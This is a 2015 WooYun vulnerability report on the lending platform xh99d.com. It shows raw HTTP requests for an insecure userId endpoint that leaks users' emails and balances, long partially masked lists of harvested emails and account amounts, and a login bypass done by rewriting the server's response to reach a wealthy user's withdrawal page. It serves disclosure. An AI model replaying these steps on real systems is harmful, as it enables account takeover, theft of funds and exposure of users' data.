当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131872

漏洞标题:新华久久贷相当大设计缺陷(影响用户全部用户资金安全)

相关厂商:新华久久贷

漏洞作者: DloveJ

提交时间:2015-08-05 16:15

修复时间:2015-08-10 16:16

公开时间:2015-08-10 16:16

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

有了这个洞分分中致富不是梦!!话说可不可以让我感受一下雷的威力!!!!

详细说明:

下载app

S50805-152732.jpg


正常的登录发现这样一个接口

POST /xh99d_api/mobile/account_manage.json HTTP/1.1
Content-Length: 20
Content-Type: application/x-www-form-urlencoded
Host: www.xh99d.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip
catalog=1&userId=238


response如下

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 05 Aug 2015 07:17:50 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 245
Connection: keep-alive
Content-Language: zh-CN
{"code":200,"message":"successful","result":{"allMoney":0.00,"avaiMoney":0.0,"blockMoney":0.0,"incomeMoney":0.00,"payMoney":0.00,"userEmail":"******@163.com","userRealName":""},"resultCode":"200","resultMessage":"Success","success":true}


id遍历即可得到用户资金,邮箱等,我们遍历一下

mask 区域
*****enan@163.c*****
*****2@163.com*****
*****198@sohu.*****
*****540@qq.co*****
*****uan@sina.*****
*****4977@qq.c*****
*****07773@qq.*****
*****831@qq.co*****
*****5848@qq.c*****
*****0@hotmail.c*****
*****ihua@126.c*****
*****735@qq.com*****
*****6921@qq.c*****
*****7653@qq.c*****
*****673@qq.co*****
*****83@qq.com*****
*****7615@qq.c*****
*****8593@qq.c*****
*****7048@qq.c*****
*****661@qq.com*****
*****78468@qq.*****
*****0705@qq.co*****
*****9700@qq.c*****
*****9559@qq.c*****
*****4984@qq.c*****
*****2083@qq.c*****
*****620@qq.co*****
*****9473@qq.c*****
*****52@qq.com*****
*****guo1974@12*****
*****030@163.co*****
*****g915@126.c*****
*****8351@qq.c*****
*****3122@qq.c*****
*****a@163.com*****
*****8603@qq.C*****
*****3712@qq.c*****
*****9195@qq.c*****
*****080@qq.co*****
*****jun0507@16*****
*****6919@qq.c*****
*****ymm@163.c*****
*****0768@qq.c*****
*****7456@163.c*****
*****6772@qq.c*****
*****2001@163.*****
*****ang@sina.*****
*****2131@qq.c*****
*****6544@qq.c*****
*****@vip.sina.*****
*****1101@163.c*****
*****507@qq.co*****
*****u@live.com*****
*****3698@qq.c*****
*****4619@qq.c*****
*****79336@qq.*****
*****an@163.co*****
*****1168@qq.c*****
*****6907@qq.c*****
*****593@qq.co*****
*****4941@qq.c*****
*****208@163.c*****
*****747@qq.co*****
*****8906@qq.c*****
*****87372@qq.*****
*****8185@qq.c*****
*****4241@qq.c*****
*****3485@qq.c*****
*****@163.com *****
*****764@qq.com*****
*****6194@qq.c*****
*****9221@QQ.C*****
*****0023@qq.c*****
*****nx09@163.c*****
*****51108@qq.*****
*****2943@qq.c*****
*****4917@qq.c*****
*****1020@163.*****
*****g-tina@16*****
*****065@qq.co*****
*****6728@qq.c*****
*****61@qq.com*****
*****47725@qq.*****
*****9956@189.c*****
*****4802@qq.c*****
*****25@sina.c*****
*****76480@qq.*****
*****481@qq.co*****
*****3513@qq.c*****
*****7787@qq.c*****
*****6694@qq.c*****
*****edu@126.co*****
*****5243@qq.c*****
*****41283@qq.*****
*****in222@163*****
*****wd@163.co*****
*****613@hotmail.*****
*****86@sina.co*****
*****406@qq.co*****
*****8493@qq.c*****
*****0746@qq.c*****
*****165@qq.com*****
*****524@qq.co*****
*****19@126.com*****
*****69813@qq.*****
*****ao@126.com*****
*****11844@qq.*****
*****87971@qq.*****
*****9478@qq.c*****
*****hina@126.c*****
*****5919@qq.c*****
*****4196@qq.c*****
*****6@qq.com *****
*****4490@qq.c*****
*****1979@qq.c*****
*****961@163.*****
*****0290@qq.c*****
*****ang@163.co*****
*****60@163.con*****
*****651@qq.co*****
*****1533@qq.c*****
*****27@126.com*****
*****hh@163.co*****
*****1701@qq.c*****
*****688@qq.com*****
*****2516@qq.c*****
*****123@163.c*****
*****1000@qq.c*****
*****2732@qq.c*****
*****4899@qq.c*****
*****625@qq.com*****
*****60426@yeah.*****
*****@126.com *****
*****0551@126.*****
*****3971@qq.c*****
*****35067@qq.*****
*****1922@qq.c*****
*****9641@qq.c*****
*****502@qq.com*****
*****0051@qq.c*****
*****dj@163.co*****
*****2016@qq.c*****
*****10275@qq.*****
*****2297@qq.c*****
*****2058@qq.c*****
*****3527@qq.c*****
*****n128@163.*****
*****1580@qq.c*****
*****527@qq.co*****
*****8168@qq.c*****
*****9760@qq.c*****
*****989@qq.co*****
*****@126.com *****
*****7718@qq.c*****
*****8719@qq.c*****
*****9314@163.c*****
*****dboy@126.*****
*****97@163.com*****
*****784@qq.co*****
*****26@163.com*****
*****304@qq.co*****
*****3889@qq.c*****
*****gjun@163.c*****
*****476@qq.co*****
*****1381@qq.c*****
*****42598@qq.*****
*****96@qq.com*****
*****6384@qq.c*****
*****88@163.co*****
*****52723@qq.*****
*****7393@qq.c*****
*****1011@qq.c*****
*****369@qq.com*****
*****79382@qq.*****
*****8967@qq.c*****
*****6763@qq.c*****
*****ju@hotmail*****
*****611@163.c*****
*****9492@qq.c*****
*****8790@qq.c*****
*****70794@qq.*****
*****66@sina.c*****
*****44865@qq.*****
*****8237@qq.c*****
*****2720@qq.c*****
*****864@qq.co*****
*****4470@qq.c*****
*****0553@qq.c*****
*****203@qq.co*****
*****860@qq.co*****
*****1946@qq.c*****
*****325@qq.co*****
*****359@qq.com*****
*****9186@qq.c*****
*****2880@qq.c*****
*****1758@qq.c*****
*****959@qq.com*****
*****4367@qq.c*****
*****6528@qq.c*****
*****4864@qq.c*****
*****6588@qq.c*****
*****8092@qq.c*****
*****954@qq.co*****
*****g0419@163.c*****
*****133@qq.com*****
*****1570@qq.c*****
*****98@163.com*****
*****@163.com *****
*****3956@qq.c*****
*****x@126.com*****
*****400@qq.co*****
*****9816@qq.c*****
*****097@qq.com*****
*****67@126.c*****
*****9648@qq.c*****
*****7772@qq.co*****
*****023@qq.co*****
*****403@qq.co*****
*****823@qq.co*****
*****590@qq.co*****
*****0223@qq.c*****
*****g_vip@126.*****
*****9674@qq.c*****
*****7510@qq.c*****
*****2107@qq.c*****
*****543@qq.com*****
*****8603@126.co*****
*****57282@qq.*****
*****1919@qq.c*****
*****7546@qq.c*****
*****964@qq.co*****
*****g2001@126.*****
*****z@163.com*****
*****3195@qq.c*****
*****1726@qq.c*****
*****7759@qq.c*****
*****alv@126.c*****
*****4456@qq.c*****
*****0281@qq.c*****
*****1923@qq.c*****
*****45611@163.c*****
*****ing@126.c*****
*****1643@qq.c*****
*****1618@qq.c*****
*****9401@qq.c*****
*****z@sina.cn*****
*****48106@qq.*****
*****5769@qq.c*****
*****4258@qq.c*****
*****681761@13*****
*****634@qq.co*****
*****24@qq.com *****
*****497@qq.co*****
*****1732@qq.c*****
*****726@163.co*****
*****6769@139.c*****
*****5239@qq.c*****
*****8@163.com*****
*****4@163.com*****
*****7183@qq.c*****
*****4049@qq.c*****
*****888@163.c*****
*****zq@sohu.*****
*****112920@16*****
*****9713@qq.c*****
*****46605@qq.*****
*****hsbank.com*****
*****7110@qq.c*****
*****0909@qq.c*****
*****1431@qq.c*****
*****70135@qq.*****
*****6@126.com *****
*****29@qq.com*****
*****99@qq.com*****
*****4807@qq.c*****
*****90491@qq.*****
*****77718@QQ*****


=================我是Dlove的分割线J========================================
然后这就发现了一堆,之后我就猜会不会有任意用户登录呢??过然后。

2.jpg


用户名和密码随便填写,登陆处抓包!

3.jpg


将response改为

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 05 Aug 2015 07:38:01 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 112
Connection: keep-alive
Content-Language: zh-CN
{"code":200,"message":"successful","result":{"emailValidFlag":1,"isOpenAccount":"0","phoneValidFlag":1,"userDocNo":"","userEmail":"dondsda@163.com","userHeadImg":"","userId":630,"userName":"yxtest","userPhone":"1511111199","userRealName":"","userType":1},"resultCode":"200","resultMessage":"{UŸ","success":true}


只需更改userid即可,其他登陆后会随网络进行更新!
我们选择刚才便利的userid,用个土豪的试试!

S50805-152659.jpg

S50805-154324.jpg

S50805-154417.jpg

S50805-154557.jpg

S50805-154605.jpg

S50805-154728.jpg


可以看到快速体现金额,这样看还是太慢,发现了这样一个接口,可以快速看到用户邮箱,总金额,患有可提现金额!

POST /xh99d_api/mobile/account_manage.json HTTP/1.1
Content-Length: 18
Content-Type: application/x-www-form-urlencoded
Host: www.xh99d.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip
catalog=1&userId=5


同样遍历userid即可

4.jpg


mask 区域
*****57266.36	152*****
*****5316.25 8865*****
*****104966.68 29*****
*****446.03 139056*****
*****52578.33 761*****
*****47642.75 wi*****
*****040.33 1983*****
*****17217.32 1193*****
*****40281.11 410*****
*****18973.09 996*****
*****957.18 qianme*****
*****40281.11 286*****
*****130.66 46509*****
*****113.34 41910*****
*****5201.67 474*****
***** 95397.72 62*****
*****8141.89 xuli*****
*****4826.17 2045*****
*****145.98 50643*****
*****3158.71 shan*****
*****85184.43 75*****
*****444126.73 45*****
*****0536.66 7142*****
*****31640.04 364*****
*****5201.67 924*****
*****6321.92 hubi*****
*****30344.06 343*****
*****0980.00 5240*****
*****0980.00 5638*****
*****3098.00 694*****
*****27964.92 349*****
*****5201.67 676*****
*****8565.35 3814*****
*****03418.06 290*****
*****9 1013.97 l*****
*****437.90 78006*****
*****21700.74 192*****
*****92395.02 wxd*****
*****120.99 80583*****
*****03 0.00 5760*****
*****423977.30 ch*****
***** 0.00 yuanl*****
*****2016.67 zhan*****
*****.00 zhangwendy*****
*****16215.05 983*****
*****1210.00 1204*****
*****316.64 36341*****
*****105705.38 ta*****
*****1210.00 haol*****
***** 2014.06 23*****
***** 201405.56 1*****
***** 71121.67 2*****
*****5 0.00 fyy9*****
*****753.83 guofei*****
*****551.10 19219*****
*****5484.93 4046*****
*****201.41 9421*****
*****158633.37 la*****
*****2184.70 409*****
***** 157670.02 2*****
*****7176.00 6570*****
*****201.67 fight*****
*****2683.34 1019*****
***** 295703.60 *****
***** 362777.85 6*****
*****7163.36 satan*****
*****0.00 jinhu0*****
*****3284.31 gufen*****
*****49775.13 158*****
*****383916.68 lu*****
*****1648.00 834*****
***** 588260.17 39*****
*****5 75570.31 l*****
*****54617.78 747*****
*****526.84 3700*****
*****416454.45 c*****
*****2 0.00 13391*****
*****41613.33 251*****
*****1957.86 3954*****
*****052.04 zqf91*****
*****6334.00 116*****
*****21331.57 348*****
*****121708.32 14*****
*****21778.60 757*****
*****5393.90 yuen*****
*****73670.28 447*****
*****813.07 liushu*****
*****110.02 lm3761*****
*****52685.05 543*****
*****58001.68 bzl*****
*****595135.35 304*****
*****76205.14 zs-*****
*****92673.00 773*****
*****10070.28 590*****
*****10070.28 417*****
***** 103078.42 9*****
*****0653.32 4000*****
*****0653.34 4594*****
*****6066.66 6734*****
*****0.00 838269*****
*****35999.99 yue*****
*****14.90 87676*****
*****100.70 1050*****
*****100.70 4749*****
*****.85 qikedong*****
*****100.70 2127*****
*****23061.17 715*****
*****632.50 hfniug*****
*****10326.66 115*****
*****156050.00 60*****
*****8.10 huangyig*****
*****144.37 67433*****
*****562.00 29043*****
***** 104033.33 1*****
*****10403.33 kkl*****
*****8489.43 4228*****
*****luyan0@hsbank.co*****
*****03.33 luyan0@*****
*****04137.36 1396*****
*****1557.93 1062*****
*****314.91 1205*****
*****544933.98 wuy*****
*****7 0.00 7579*****
*****20977.37 121*****
*****1073.34 5142*****
*****095.99 lu229*****
*****31680.00 798*****
*****3 502037.90 1*****
*****9.60 chenhui*****
*****289.31 lacy0*****
***** 65371.36 ky*****
***** 72927.37 15*****
*****3 96546.68 1*****
*****291.68 35398*****
***** 620.87 281*****
***** 50351.39 12*****
***** 50351.39 46*****
***** 50351.39 16*****
*****5035.14 5474*****
***** 51633.34 lx*****
***** 165971.23 6*****
*****181.66 xiaobai*****
*****5293.18 245*****
*****12.21 heting*****
*****4.03 1385511*****
*****523.24 6178*****
*****23.24 70938*****
*****853.06 30635*****
*****018.65 51049*****
*****0.00 449300*****
*****9886.26 7181*****
*****0.00 329383*****
*****11.14 14524*****
*****5.36 1832668*****
*****957.38 35110*****
*****9749.13 1089*****
*****11.21 35779*****
*****468.43 17294*****
*****105.42 ghtz*****
*****7917.72 4994*****
*****621.67 31278*****
*****8557.51 3297*****
*****683.34 42563*****
*****0.00 737726*****
*****941.50 lhy20*****
***** 0.00 5988*****
*****4639.08 1985*****
*****2.01 jincong*****
*****965258.29 y*****


我们这次目标锁定,直接奔土豪!

5.jpg


就这个1千万的土豪了,登陆试试!

1.jpg


=======================
没有点确定,拒绝查水表!!
=======================

漏洞证明:

修复方案:

你肯定知道

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-10 16:16

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无